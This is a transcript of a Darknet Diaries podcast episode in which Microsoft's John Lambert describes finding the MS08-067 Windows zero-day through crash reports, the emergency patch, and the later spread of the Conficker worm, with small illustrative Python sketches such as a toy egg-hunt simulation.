Darknet Diaries | MS08-067 | What Happens When Microsoft Discovers a Major Vulnerability within Windows

Listen to what goes on internally when Microsoft discovers a major vulnerability within Windows. This is the story of what happened when Microsoft found a massive bug in Windows which paved the way for the largest worm in history. Guest John Lambert gives the inside story to Jack Rhysider.

This episode is sponsored by SentinelOne. To learn more about our endpoint security solutions and get a 30-day free trial, visit sentinelone.com/darknetdiaries.

Enjoy!


Hey, it’s Jack, host of the show. Let me ask you a question. Whose job is it to keep the roads you drive on safe? Is it the driver’s sole responsibility? What about the car makers? Are they responsible for keeping the roads safe for other drivers? What about the cops? Maybe they need to come by and watch everyone to make sure they’re obeying the law and keeping everyone safe. Maybe it’s the job of the civil engineers, the people who design the roads. I mean, a crazy, curvy, bumpy road with a speed limit of 100 miles per hour is obviously not safe, so it must be their job to design it to be as safe as possible, right? So whose job is it to keep the roads safe?

All these people. We need drivers to drive safely. We need cars to be built with safety in mind. We need cops to catch people who aren’t being safe. And we need civil engineers to design us safe roads. And I think this analogy applies to keeping our networks and computers safe, too. We need users to be smart about what they click on and do. We need software makers to design their software to be secure. We need the cops to arrest people when they break the law. And we need groups who set up industry standards that guide us to safety. We cannot rely on one person to keep our networks safe. It takes all these people always being vigilant to keep our computers safe.

And this is a story about what happens when a software maker finds a bug in their own software, and what the effects of that were. Specifically, this is a story about when Microsoft found a massive bug in Windows which paved the way for the largest worm in history.

These are true stories from the dark side of the Internet.

I’m Jack Rhysider. This is Darknet Diaries.

Support for this episode comes from SentinelOne. It’s all too common: a family member or colleague calls asking for help because some kind of ransomware has infected their computer. Bummer. Now imagine this on the scale of an entire organization. This is exactly what SentinelOne was built to prevent and solve. Besides the ability to prevent ransomware, and even roll back ransomware if it does encrypt, SentinelOne also has a ransomware warranty. Visibility into each of these endpoints is available from an easy-to-use console, allowing security teams to be more efficient without the need to hire more and more people. On top of that, SentinelOne offers threat hunting, visibility, and remote administration tools to manage and protect any IoT devices connected to your network. With SentinelOne, you can replace many products with one. If you’re a CISO, a security leader, or an IT manager in the enterprise, don’t settle to live in the past. Get a personalized demo and a 30-day free trial that allows you to see the benefits up close and personal. Go to sentinelone.com/darknetdiaries for your free demo.

Your cybersecurity future starts today with SentinelOne.

I’m very excited about this episode because I think this is a rare story to hear. We aren’t going to hear from the hacker who found the exploit, and we aren’t gonna hear from a company who got hacked by this exploit. Instead, we’re gonna go right to the source to hear the story of one of the most notorious bugs ever, right from the horse’s mouth: Microsoft.

Hello. Hey, Jack, can you hear me? Yeah, I hear you pretty well. What kind of mic are you using?

This is a headset. It’s actually made by Microsoft. This is John Lambert. My name is John Lambert and I work at Microsoft.

He’s been with Microsoft a long time. While he was there, he spent ten years working on a team called the Trustworthy Computing group.

So that was a group that was created after the early worms of Code Red, Nimda, Blaster, Slammer. And it was designed to help improve customer trust in Microsoft products by fortifying them from a security, privacy, and reliability perspective. The domain I worked in was security. And so a lot of that focus was on finding and eliminating vulnerabilities in the design and coding of the products, and working across the Microsoft products, not just Windows or Office, but all of the products, to sort of build in the techniques that security researchers had familiarity with and then inculcating that sort of ethos and know-how inside of the Microsoft development cycle.

Well, what an interesting role to have, right? His mission is to improve the trust people have in Microsoft products by making them more secure. And I just looked this up: in 2008, Microsoft had 91,000 employees. With that many employees, yeah, I guess it makes sense to make a team to improve the trust of their products. Oh, and in case you’re wondering, in 2019 they had 144,000 employees. Now, of course, the biggest Microsoft product that John would work with is Windows, the operating system itself. John got the ability to examine Windows in unique ways by looking at the source code, building relationships with developers, and conducting security tests against it. It’s not really his job to make sure all the bugs are squashed or to find the bugs, but he was certainly involved in getting all the teams together to help find the bugs and get them fixed. Okay. Now, when the team at Microsoft finds a bug in Windows, they give it to the developers, who then work on a fix and create a patch for it.

And they issue these patches on Tuesdays. Every Patch Tuesday, which is the second Tuesday of the month, we will create a number of security bulletins. The bulletins essentially are the advisory that describes: here are the vulnerabilities that we are fixing in, say, Internet Explorer or Windows or Office. And every bulletin may have one or more vulnerabilities that is being fixed. Those have individual CVE identifiers that security professionals are familiar with. But the bulletin is essentially a grouping of them for a product.

And the bulletin is rated, you know, critical, important, moderate level of severity.

Now, these advisory bulletins put out on Patch Tuesday might have a name like MS07-029 or MS08-067. And if you see something like this, MS07-029, it means the advisory was published in 2007 and it was the twenty-ninth advisory of the year.
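If it helps to see that naming convention concretely, here is a tiny Python sketch that pulls the year and bulletin number out of an ID like MS08-067. It is only an illustration of the scheme described above, not any official Microsoft tooling.

# Illustrative only: split a bulletin ID like "MS08-067" into its parts.
def parse_bulletin(bulletin_id):
    prefix, number = bulletin_id.split("-")   # "MS08", "067"
    year = 2000 + int(prefix[2:])             # "08" -> 2008
    return year, int(number)

print(parse_bulletin("MS07-029"))  # (2007, 29): the 29th bulletin of 2007
print(parse_bulletin("MS08-067"))  # (2008, 67): the 67th bulletin of 2008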

So for this story, we’re gonna be talking about the security bulletin MS08-067, which means we’re talking about a bug which was found in 2008. Vista had just come out the year before, but its adoption rate wasn’t that strong, so the majority of Microsoft Windows customers were still using Windows XP. And take a guess at how many lines of code it took to create Windows XP: 45 million lines of code.

And of course, that was spread out among many teams. Trying to keep a program that big bug-free is, well, in my opinion, impossible. It’s just way too big to keep bug-free. There has to be some function or routine in the code that didn’t get tested properly or coded properly and has a glaring bug. Or sometimes it gets tested and coded properly, but there’s a bug that’s not so glaring in there. It only appears under weird circumstances, like only when the memory is filled and it’s only a certain millisecond at a certain time of day. Weird stuff happens when you have a code base that big. And all this is to say: because Windows XP was 45 million lines of code long, just by that size alone, it must have had a lot of bugs. But before we get to MS08-067, maybe we should talk about a bug found the year before, called MS07-029.

Okay. So that MS07-029 was very important. It was sort of a moment of insight, if you will, for all the things that came after it. What MS07-029 was, that was a bulletin that corrected a vulnerability with Windows DNS. When Microsoft became aware of it, a customer that was being exploited in the wild contacted us and said, somehow we just got attacked; here is an attack tool that we were able to find associated with it; we think it’s exploiting a vulnerability somehow. And that goes into MSRC.

MSRC is the Microsoft Security Response Center. This is the team of security professionals within Microsoft that is in charge of making Windows secure, looking for bugs, and getting them fixed. They took this report they got and tested it to see if you could hack into a fully-updated Windows computer with it. And it worked.

And then they investigated and found this zero-day in Windows DNS that was being used. They put out an advisory. They put out a bulletin. And what I was doing as I was looking at this sort of crash dump system that Microsoft has, this Windows Error Reporting, I was working with some engineers that were looking at the crash reports coming in associated with Windows DNS. The DNS product was otherwise very reliable and hardly ever crashed. And so the only crashes coming in at that point, when we looked at them, were actually attacks in the wild.

And when we started to examine them, we could tell that actually we could have known about this attack in the wild much earlier than the customer contacting us, if only we’d been able to pull these needles out of the massive haystack of crashes coming into Microsoft.

Have you ever used Windows or Internet Explorer or Microsoft Word and the app suddenly crashes and it says, do you want to send the crash data to Microsoft? This is what’s known as WER.

Yeah. So Windows Error Reporting, WER. It’s also known internally as Dr. Watson. It’s really a technology that goes back to the late 90s. Both Office and Windows were independently working on how do we get better data on how the products are crashing before we ship them, and then after we ship them. Other than customers calling customer support, how do we get data about how they’re faring in the wild? And so both Office and Windows had built features to collect crash reports at scale that could be automatically submitted by customers, and then run analysis tools against them to try to root-cause and bucket them, to say, OK, is this a new bug we don’t know about, or is this an existing bug that we do know about happening again? And those two efforts came together, and that feature was built into Windows, and that was called Windows Error Reporting.

So yeah, that little box that pops up when an app crashes will ask you if you want to send the crash report to Microsoft.

And if they say yes, then that communicates with Microsoft and the backend system decides, is this something we already know about or is this something new? And if it’s new, it starts to prompt the user to potentially upload more data so we can root cause the issue further.

Now, remember, I said that XP had 45 million lines of code, and a program that big is impossible to keep bug-free. And yet I don’t think there’s just a dozen bugs in a program that big. I don’t even think it’s just hundreds of bugs or thousands of bugs. I think there’s more like tens of thousands of bugs in a program with 45 million lines of code in it. At the same time, Windows was installed on a billion computers in 2008, so Microsoft was seeing millions of crash dumps a day from these computers. So let’s try to be a project manager for a second here and come up with a strategy to tackle these millions of crash dumps a day. We have a few options. First, let’s just filter out all the known bugs we’ve already fixed. People’s computers are crashing, but they just need to patch and it won’t crash anymore. OK, that’s out of the way. But now, when we try to prioritize what to look at next, it’s not so easy. It might make sense to tackle the bugs that show up the most, but these might be very low severity, maybe not as important. Maybe there’s something with a higher severity, but not as many crash reports. So then you might decide to look at the highest-severity crash reports instead. Or maybe some apps are more important than others; like if MS Paint crashes, it might not be as big of a deal as if the whole computer was crashing. Or maybe you look at the easiest-to-fix problems first and get those out of the way. It’s really hard to know what to prioritize here. So this might give you a better understanding of how hard it would be to look through millions of crash reports a day to figure out what to fix first. But it was still very important for Microsoft to collect these dumps and analyze them. At this time, in 2007, John was starting to look at these crash reports to try to make sense of them.
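To make that prioritization problem a little more concrete, here is a minimal triage sketch in Python. The field names, the severity scale, and the ranking rule are all assumptions made up for this example; this is not Microsoft’s actual crash-bucketing pipeline, just one way you could rank buckets once the already-fixed ones are filtered out.

from dataclasses import dataclass

@dataclass
class CrashBucket:
    signature: str     # deduplicated crash signature (the "bucket")
    count: int         # how many reports landed in this bucket
    severity: int      # 1 (low) through 4 (critical), assigned by analysis tooling
    known_fixed: bool  # does an existing patch already address this crash?

def triage(buckets):
    # Step 1: set aside crashes that an existing patch already fixes.
    fresh = [b for b in buckets if not b.known_fixed]
    # Step 2: rank the rest; here severity wins and prevalence breaks ties,
    # but you could just as easily rank by count first, as discussed above.
    return sorted(fresh, key=lambda b: (b.severity, b.count), reverse=True)

buckets = [
    CrashBucket("mspaint_null_deref", count=90000, severity=1, known_fixed=False),
    CrashBucket("svchost_stack_overrun", count=12, severity=4, known_fixed=False),
    CrashBucket("word_old_crash", count=500000, severity=3, known_fixed=True),
]
for b in triage(buckets):
    print(b.signature, b.count, b.severity)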

They go up to a massive automated system. These tools run against them at scale in a completely headless way. They are sort of bucketed and binned in a way that makes it easy for engineers to know: is there something new coming along, or how active, how prevalent is this issue? A wide variety of engineers across the company use it. If you work on Office, you look in the Office crash buckets and see what is hot for you there. If you work in Windows or any other product, you can kind of see how is my product crashing. So engineers across the company were using this to fix bugs. And then, for example, in Windows Vista, from the Trustworthy Computing side, they ran all kinds of static analysis tools to find and remove reliability issues.

And I think they fixed one hundred thousand bugs through those efforts, and through Windows Error Reporting they found another 5,000 bugs that had escaped all of those processes that they went and fixed. And so every service pack, every new product from Microsoft is more reliable because they’re finding and fixing all these bugs that are manifesting in the wild. I was there kind of on the side saying, this is a fascinating telemetry system; how do we look at this from a security point of view?

You said a hundred thousand bugs?

One hundred thousand changes to the product that were done. Because not all of those are bugs. One way to think about it is, there are coding practices that are sort of outdated. Developers will know about these things, like calling these unsafe string functions like strcpy and so forth. And instead of trying to figure out which ones are vulnerabilities and which ones are not, they said let’s just go remove all of them from the product. And so that’s a massive amount of code changes. You know, many of those are not bugs. Many of those are not vulnerabilities.

But it’s an easy way to just go say, look, we’re gonna have a new standard of engineering where we go get rid of that whole class of thing by tackling that. So that’s an example of some of those changes. Yeah. But I mean, are you exaggerating when you say one hundred thousand, or…? No. No.

Jeez. Can you imagine trying to keep something like this secure? To fix a hundred thousand things in the code just sounds like madness to try to complete. I guess this is why they needed 91,000 Microsoft employees, to tackle huge issues like this. These crash reports were really helping them identify the problems that needed fixing. But even though these might be bugs, they might not all be security problems. Like if you click print and nothing happens, that might be a bug in the code, but is it really a security issue? A hacker probably can’t use that to take control of your computer or hack you. But John was looking at this and wondering if there was anything in these crash reports that a hacker could use, or maybe signs that a hacker caused a crash.

Some vulnerabilities are discovered by attackers and exploited in the wild before Microsoft is aware of them. And how could we go find that before customers contact us? There are a lot of reasons that exploits actually fail in practice, and that was the idea, which is, instead of trying to find exploits when they’re working, sometimes they don’t, and there’s a bunch of interesting reasons why they don’t. And by studying the causes of failure of those exploits in the wild, that would lead us to potentially discover them. Some of the reasons they fail are because the exploit was written for, say, an English-language version of Windows and it’s run on a Chinese-language version, and they’re slightly different internally. So for a wide variety of reasons, exploits would fail in practice. And I studied extensively all the different patterns of how they fail, because that was what I needed to be able to understand to find them.

The hunt was on for John. He wanted to find traces of hackers in the WER logs. But like I was saying, there are millions of error logs a day. This wasn’t gonna be easy.

Yeah, I mean, I think back then it was over a billion a month, and I recognize it’s like, how could you look through a billion a month? Because of the way Windows Error Reporting buckets the issues, you don’t have to look at every single one, one by one. You’re really trying to find new ones, new ones that are interesting in a different way. And then another way to think about it is, there’s only a certain number of ways that zero-days are going to kind of show up and affect an application. And so, you know, people can send malicious documents that’ll crash Word, so Word is interesting to look at. People can send exploits with the browser, so Internet Explorer would be interesting to look at. And then, if you think about even inside of Microsoft Word, if an attack is going to happen, likely it’s going to happen when the user is first opening the document. You know, it’s rare that some exploit is designed to work when the user has been in Word for an hour and they finally click Tools, Options, Spell Check, Add-in and then it goes boom. Those are not the paths where an exploit is going to work. It’s gonna be in the file-open code path. So that further narrowed down the places that we needed to look at. Then exploits fail in certain specific patterns that are the kind of patterns that we sort of knew to go sifting over. So we were able to work that funnel down from a billion reports a month to, you know, millions that seemed interesting, to hundreds of thousands that had no other clues in them, and so forth, and whittled the funnel down.
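Here is a rough sketch of the funnel John is describing, written as a chain of filters over crash reports. The process names, the exploit-failure check, and the report fields are stand-ins invented for this example; the real heuristics were never published in this form, so treat it as a cartoon of the idea rather than the actual system.

# Cartoon of the funnel: a billion reports a month in, a handful of suspicious ones out.
INTERESTING_PROCESSES = {"winword.exe", "iexplore.exe", "svchost.exe"}  # attack-facing apps

def looks_like_failed_exploit(report):
    # Placeholder for the failure patterns John studied, e.g. shellcode-like
    # bytes on the stack or crashes in file-open and network-parsing code paths.
    return report.get("shellcode_on_stack", False)

def funnel(reports):
    for r in reports:
        if r["process"] not in INTERESTING_PROCESSES:
            continue   # most crashes are not in code an attacker would target
        if r["known_bug"]:
            continue   # already-understood reliability issues
        if not looks_like_failed_exploit(r):
            continue   # an ordinary crash, not a failed attack
        yield r        # the rare needle worth a human's time

suspicious = list(funnel([
    {"process": "svchost.exe", "known_bug": False, "shellcode_on_stack": True},
    {"process": "calc.exe", "known_bug": False},
]))
print(len(suspicious))  # 1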

John dedicated a lot of time to try to find this unknown vulnerability that some hacker was exploiting.

And when we come back from the break, John finds something that he’ll never forget.

Working remotely can be a challenge, especially for teams that are new to it. How do you deal with your work environment being the same as home while staying connected and productive? And then there’s your newest co-worker, the cat. Well, your friends at Trello have been powering remote teams globally for almost a decade. At a time when teams must come together more than ever to solve big challenges, Trello is here to help. Trello, part of Atlassian’s collaborative suite, is an app with an easy-to-understand visual format, plus tons of features that make working with your team functional and just plain fun. Trello keeps everyone organized and on the same page, helping teams communicate, focus, and connect. Teams of all shapes and sizes, at companies like Google, Fender, Costco, and likely your favorite neighborhood coffee shop, all use Trello to collaborate and get work done. Try Trello for free and learn more at trello.com. That’s t-r-e-l-l-o dot com. Trello.com.

On September 25th, I remember opening a crash report for the svchost service host process, which we had seen many millions of crash reports for already, because a couple of years earlier there was this other vulnerability, MS06-040, that had been adopted by bots and worms to spread, and it was causing millions of crashes against machines that had not put on that patch. But this one was a little different.

So first of all, it had an exploit. It had exploit code in it. OK, that didn’t mean it was new; it could be an old one. It was an exploit on the stack, which is a critical part of memory, that tells you that the exploit was trying to be activated. Now, it had a difference in it, what I call an egg hunt, which was an exploit technique that I had never seen before for any exploit in MS06-040. So this was either a new strain of that or something new for that service host. And an egg hunt is an exploit-writing technique where, like, as the bad guy, imagine you’re going to go scale a wall, and you put all your attack tools, your thieving tools, in a bundle and you throw it over the wall, and then later you go scale the wall and go get that. An egg hunt breaks the exploit into two pieces to serve a purpose like that. And it had that technique in it. So that alone drew my eye to look at it. And then the odds of there being a buffer overrun and an exploit in the same area as this MS06-040 just seemed unlikely. And yet I felt like, if it was new, this was really important. And so I just tried to stick with it and do what I could to rule in or rule out whether this was new. And one of the most stubborn clues was, a crash report has information about every DLL that is loaded into it, and the vulnerable DLL, the DLL that had MS06-040, was loaded in it. That is netapi32. And the version information told me it was fully patched. So it clearly could not have been exploiting that vulnerability, because that vulnerability did not exist in that version of the product.

John looked at the logs here, and it looked like a hacker was using a two-stage exploit. One stage was basically injecting some hacker tools into the system, hiding an egg, if you will. And the other was going in and using those tools. A strange combo, but like John said, it was sort of like throwing your tools over the fence and then jumping over the fence to get them. The two components involved here were svchost, or Service Host, and netapi32.

Yeah. So sometimes when you are writing an exploit, you have constraints that you have to work within. And once your exploit starts to run, you have a number of steps as the attacker you’re going to want to do. Typically, that involves downloading some external piece of malware to that system and then launching that, and then the rest of your attack; then you’re resident on that computer and you can do whatever attacks you want to do further from there. But you have to get it going. And sometimes that shellcode, as it’s called, to get going, can’t fit within the constraints of the vulnerability. The buffer it needs to fit in, for example, is just too small a box to package all those instructions into. And so an egg hunt is a technique that is designed to solve that, by first sending over some data and interacting with the vulnerable program in a way that doesn’t use the vulnerability at all. It just tries to get data in memory that is that bag of tools, that shellcode that they are going to use later. And then the only thing that they need when they actually run the attack is a very small piece of shellcode that basically goes and searches memory to find that bag of tools.
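To make that two-stage idea concrete, here is a toy Python model of an egg hunt. A real egg hunter is a few dozen bytes of shellcode scanning process memory; this sketch only simulates that scan over a byte buffer, and the tag value and payload are made up for illustration.

# Toy model of an egg hunt; not real shellcode.
EGG = b"w00tw00t"   # hypothetical 8-byte marker planted right before the payload

def egg_hunt(memory):
    # Tiny stage one: find the egg, return the "bag of tools" staged after it.
    idx = memory.find(EGG)
    if idx == -1:
        return None                  # the egg never landed, so the exploit fails here
    return memory[idx + len(EGG):]   # the large second stage planted earlier

# Stage 1: the attacker parks the big payload in memory via ordinary, non-exploit traffic.
process_memory = b"\x00" * 4096 + EGG + b"<large second-stage payload>"

# Stage 2: the small code that fits in the overflowed buffer only has to find and run it.
print(egg_hunt(process_memory))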

What a tricky exploit. And because there are two parts to this bug, it makes it really hard to find. The more John looked at this particular crash report, the more he started to realize this was actively exploiting an unknown vulnerability in Windows, which makes it a zero-day bug.

This, in a way, was the hardest moment of this entire thing for me, because I clearly had enough evidence to say this was a new attack, a new vulnerability that we did not know about. But to get the company to act, you need to actually pinpoint the vulnerability. We have to know what’s the code that’s wrong; otherwise, nothing can happen. And I pored over the code and pored over the code, and I could not figure it out. At one point, I decided the clock is ticking, this is a potentially really bad situation; I need to go ask for help if I’m going to figure this out. And I walked over to the office of Andrew. Andrew was a colleague of mine. We had worked together previously, actually. Andrew had looked at many crash reports for security objectives for a long time, and he knew what this hunt was like, which is, in a lot of ways, it can be a very frustrating hunt. You can spend hours looking at something you think is real and then it’s not. And so what I wanted is to hand this to one of the MSRC engineers and they will go figure this out. And he was reluctant to take an engineer off of an existing confirmed vulnerability that somebody else had reported, that he was in the middle of, to go potentially chase a ghost. So he took it on, took a look at it, I think in his mind saying, look, this is a false positive, this is not a real issue, and case closed. And so there was some tension in the air, with me really pushing a busy team to go look at something that likely was not going to pan out, but feeling like it could be important enough that it’s worth doing, and Andrew wanting to protect his team, but doing the due diligence to make sure we got the answer right.

So Andrew got a copy of this crash report and the code for these processes, and he started analyzing all this. He spent a couple of days looking it over and working on it, trying to find what the crash report means. There’s an egg somewhere in the code, but neither of them could find it. But this error report did say that there was something causing a crash. Now, keep in mind, John had only seen one crash report from this. This wasn’t a widespread issue. So both John and Andrew weren’t entirely sure how much effort they should spend looking for something that only happened once, on one computer. But if there was an unknown vulnerability, both John and Andrew wanted to find it and fix it.

So Andrew kept looking.

And then at one point he stops by my office and the look on his face told me everything.

The look was the look that a security researcher has when they’ve found something. There’s a goofy, happy smile that is also full of, holy cow, I can’t believe how serious this thing is that I just found.

He said, I found the vulnerability. And when I heard that, I knew the next two weeks of my life were going to be completely different, because this vulnerability was in an area that would allow an internet worm to be written against it.

The vulnerability they found allowed an attacker to take remote control of a Windows computer. No need for a username and password, no need for RDP to be enabled or anything like that. Just, give me full control of that computer, and now I can issue my own commands on it, see any files, do whatever I want on that computer as if I’m right in front of it. And of course, to top it off, it’s a vulnerability in a fully-updated version of Windows. In the security world, we call this kind of vulnerability an RCE, which means remote code execution: a hacker can execute whatever commands they want on the victim’s machine. And this is the worst kind of vulnerability. It’s the most critical, the most severe, because you absolutely never want just any Joe Schmo executing commands on your computer, even one which has its full defenses up. If you can run whatever commands you want on someone else’s computer, it pretty much means it’s your computer.

But to top it off, as if this highly critical and severe vulnerability wasn’t enough.

This exploit was wormable. Wormable means that you have a vulnerability that an attacker can write an exploit for, and it can propagate across the internet, exploit that vulnerability, and then turn around and continue to repeat the process and propagate further. So it becomes a viral outbreak, and it is the most damaging, devastating, disruptive kind of attack that can take place. And the world has seen many worms in the form of Blaster, Code Red, Nimda, Slammer, Zotob. And we knew how devastating these attacks can be. Entire businesses are disrupted. Systems are taken offline. Network traffic gets clogged with worms replicating out of control, using up all available bandwidth. And so we knew what the potential was. We didn’t think that that had been happening yet, but we knew that was possible.

So when Andrew came to John’s office and told him this vulnerability is real and wormable, the two immediately jumped up and sprang into action.

So Andrew and I both are on the engineering side, and we knew we needed to go activate the crisis response part of Microsoft.

So he and I immediately leave my office. We walk down the hallway to the office of the crisis manager. His name is Philip. Philip has worked on many of Microsoft’s most important security crises, and he is chatting in his office with a colleague. We show up; he knew that wasn’t a good sign. We look at Philip and say, we need to talk. He looks at his colleague and says, I’ll talk to you later. And then I said, we have a zero-day.

And he just knew, by the two of us showing up in that fashion, that something bad was happening. I mostly have two emotions going on. One is, we need to get all of Microsoft engaged on this that can do something about it. So that is an impetus to go make sure you’re informing people so they understand the severity right away and they can begin the mobilization process. And then the other side of me was, what is really going on out there? I have one crash report. I don’t know if there are a hundred thousand out there just like this, and this is a worm that is raging across different parts of the world, or this is something that’s just getting started.

So I immediately wanted to go and get some better situational awareness about scope and scale, to know what we were really dealing with.

John and Andrew briefed the crisis manager on what’s going on: that a very serious, wormable, extremely critical vulnerability is present in Windows and needs to be fixed immediately. And while they found this in Windows XP, the vulnerability existed in more than just XP.

Yes. And it affected every version of Windows that we had at that point. So Microsoft has a crisis response process that they invoke when one of these things occurs. It’s called a SSIRP internally. And then a bridge call is stood up, and all of the kind of crisis partners across the company join that call, and then Philip would take them through, here’s a summary of the situation. And generally speaking, if there’s a vulnerability in Windows, you know, teams know what to do. This would involve a lot more teams because they had to be ready for customer support calls. If there’s an attack, what is the malware, what does the threat side of it look like? And the anti-malware team will start building signatures for that. We knew we had to prepare data for all of the security partner companies, across Symantec, McAfee or whatnot, for them to help go protect their customers and the ecosystem. And then the engineering team needs to go, OK, what do we have to do to fix this vulnerability? And are there any others just like it waiting there that we need to fix at the same time, so we get the patch dead right?

A huge conference call was set up with pretty much someone representing all the different departments of Microsoft. The goal was to get everyone engaged in helping solve this as quickly as possible. This vulnerability was much more severe than any of the others they’d found.

Once I knew that the right people were engaged and working to get the right patch out the door, the thing I could go help on was, how often is this happening and where is it happening? And that called for dialing into the crash buckets to find any information I could about how often this was occurring. Then I was able to bring back the situational awareness to the crisis response that said, OK, I saw it five more times today; it just spread from Malaysia to Japan to Singapore to what-not. And they could get a sense of, OK, it’s the same attack payload communicating with the same IP address on the internet to pull it down, but it’s spreading from geography to geography to geography. So it didn’t look like a worm, but it looked like some set of hackers that were going around using this tool across a variety of targets, expanding its scope every single day.

See, that’s fascinating. So somebody knew about this vulnerability; they found this before Microsoft did and were using it. And this wasn’t just some accidental bit flip or something that caused the crash report; this was actually somebody who had coded this and was using it in Asia.

That’s right. So somebody found this vulnerability, probably got the bonus of the year for finding it, and then it was weaponized. And then some group, unknown to this day, was using it in those geographies where we saw these crash reports coming in. And the tool was not completely reliable, and so that’s the crashes that we were seeing; that’s when it failed. But obviously it worked and it succeeded a bunch of the time. And I didn’t know how often: for every crash, is that one in one hundred times that it’s crashing, or is it one in a thousand? You know, what shadow of the real activity am I seeing? That was an unknown that we were working against.

And so, but I could use this to sort of get a sense of its spread and its reach and its pace.

Now, this became a top priority for the development team to fix. They dove into the code and fiercely started to rewrite the code to fix this problem.

And they did. They fixed the vulnerability. But this is not the end of our story. No, no, no, no, no, no. This is just the genesis. And stay with us, because after the break, we’ll hear how this went on to become one of the most notorious bugs ever to be found in Windows.

Support for this episode comes from ProCircular. Now, even though vendors make patches available for us to update our computers, patching is still really hard. It requires juggling files and scheduling reboots, and to do all that at scale against all your computers can be a nightmare. No wonder MS08-067 was a problem for a whole decade. ProCircular has helped hundreds of clients slay that dragon. It’s all about adding security in layers, and they’re really good at helping with all the details of getting your network secure. They have a team that can help your business with patching and vulnerability management, doing some monitoring that actually works, penetration testing to verify it’s actually secure, and incident response in case things do actually go bad. Whether you’re just getting started or looking to move to the next level at securing your business’s network, ProCircular has the people and resources to help you get there. ProCircular will help you confidently manage your cybersecurity risks. Visit www.procircular.com. That’s www.procircular.com.

Now that a fix was written and a patch was ready, a decision had to be made about how to release this to the world.

Right. So there’s a decision point as part of this response process, which is, OK, when is the patch going to be ready? And the ideal time to release a patch is on Patch Tuesday, because every IT team in every company knows, on the second Tuesday of every month, there’ll be a set of security patches from Microsoft. And they know to organize their patching of their fleet of systems and take their downtime and their maintenance time to go put them on. And they know some of them will be severe and they should do that right away. So IT teams are best ready to consume those updates and put them out at that time. The other option is you just ship it when you’re ready. We call that going out of band. That gets the solution out there sooner, but at the same time, none of those IT teams are necessarily ready and poised to go grab it. And we had a situation where there obviously was an attack in the wild that attackers were doing, and we wanted to go stop that from happening, but we knew as soon as we put this out, copycat attacks would happen by people reverse engineering the patch and understanding it, and that would spawn a whole other wave of attacks. And so there was this weighing of, if you go out of band, you could spawn a bunch of copycats of a very damaging vulnerability when IT teams are not ready to go put it on, and there could be more victimization. The bottom line, in terms of our calculus on it, was: it was a very severe vulnerability, it was wormable, it affected every version of Windows, we had a solution, and we went out of band.

This vulnerability was so severe that they decided to not wait until Patch Tuesday and just push this out immediately, as soon as they had it. And this patch went out in 2008, and it was the sixty-seventh bulletin of the year, which famously made this MS08-067.

Yeah. So there were two interesting things that happened after we went out of band. The first one was that attacker, where I was seeing crash reports still coming in every day until we went public. As soon as we went public, that attack disappeared and I never saw him again.

And how can you trace that? Because, I mean… oh, so you have like a signature for certain machines that kept getting attacked?

Well, part of it was the attack details that were in it. So one, the shellcode and egg hunt were kind of a fingerprint that were consistent across all the crashes I had gotten to date for this issue. All of them were contacting the same IP address of a server in Japan and downloading a payload from it. And so all of that was consistent.

And then the day the patch goes live and we announce it, I see no more crash reports from this anymore. And then there’s this period where, for a number of hours or a day, nothing’s coming in anymore. And then we start to see new crash reports for the same issue that were clearly security companies reproducing this vulnerability. They’d reverse engineered what we fixed in the patch. They were writing their own proofs of concept to crash it; not writing exploits for it, but just probing the vulnerability to make sure they understood it. And we started seeing those crash reports come in from the security researcher side. And soon enough, a few days after that, we started to see new attacks beyond the first wave of attackers, that were clearly different and new from the original ones, that looked like, you know, bots or botnet programs adopting this as a spreading mechanism. And we started to see that wave as well.

See, this is what I mean by this being only the genesis. Now that the patch was out there, both white hat and black hat hackers analyzed the patch to figure out what this exploit was and how to run it, which means this tool went from being just used by a single hacking group somewhere in the world to now being known by the general hacker community. And within a short time, it would become available for anyone in the world to just download and use.

Isn’t that a strange dilemma or decision to have to make, though? Knowing that if you put a patch out, it reveals the vulnerability to the world for any hacker to use. But Microsoft has a duty to make secure products, so they absolutely have to release the patch whenever they do find a vulnerability like this, because it has far-reaching effects on helping people stay secure.

In the first week, it was on Windows Update, and within seven days I think we had patched 400 million machines.

This is sort of the awesome part about Windows Update. It’s a system that had been built to patch the Windows ecosystem at scale, and this is one of those times when you really needed it. And it came through in terms of our ability to essentially inoculate a huge swath of the world against this vulnerability in a very short period of time. And so it was very effective at that.

It’s hard to know for sure, but my best research tells me there were about one billion Windows computers in the world at that time, and this vulnerability affected all of them. So having 400 million of them patched in the first week was a huge win for helping the world become more secure. Forty percent of the Windows computers in the world were no longer vulnerable to this right away. That’s awesome and amazing.

So all of this was in October, and sometime in early December, the Conficker worm, which had been a sort of small-scale thing for a time, adopted this vulnerability as a spreading mechanism, and then it began to use that against systems around the world that had not put this patch on yet.

And if you think about, well, what if only one percent of the Windows PCs in the world don’t patch? That’s still millions of systems.

And so the damage that was done by Conficker was significant. Imagine what would have happened if it had had half a billion more PCs that were vulnerable and not patched against this issue.

Conficker was the first big attack to use this exploit. Just months after John discovered this vulnerability, Conficker figured it out and used it to arm itself to infect Windows machines. Because the vulnerability in MS08-067 was so effective, Conficker spread rapidly, ultimately infecting computers in over 190 countries worldwide. It would eventually infect millions of computers. Conficker was spreading in a terrible way. I mean, think about how horrible this is, for some hacker group to have full control of millions of Windows computers worldwide. I’m talking about government agencies, businesses, and home PCs. The hackers could see all the files on them, run any commands they wanted, install keyloggers, take screenshots, install rootkits, or do whatever they want on these computers.

It’s so frightening to think about that. Conficker continued to spread, seemingly unstoppable. By January, 30 percent of Windows computers still had not applied the patch to protect themselves from MS08-067 and Conficker, which means hundreds of millions of computers were still vulnerable to this. Conficker had a field day with everyone who didn’t bother to patch and eventually was able to infect 10 million Windows computers worldwide.

As far as I know, this makes Conficker the largest worm ever. All thanks to MS08-067.

It was disappointing, but at the same time a strong lesson, because we’d put the patch out, right?

The job is done. It’s time for the world to put the patch on their systems. That’s the step they have to do. There isn’t anything further that we thought we could do. And yet look what happened and what came after that: all of this damage from Conficker. Now, Conficker had other ways to spread, through USB drive infections and scanning file shares and so forth. But still, there was a large part of the world that had not patched against this vulnerability. And it was a bit of a lesson for just how damaging things can become and how much of the world can be exposed to these attacks, even once we think we’ve done our part of the job.

It’s fascinating to me to see that John here was the one who decided to take it upon himself to look at that crash report to discover this. If it wasn’t for him, who knows how long this would have stayed out in the world before being discovered?

Yeah, I think, you know, these operators using this tool thought they had a really great new attack, and probably would have kept using it if it was more reliable.

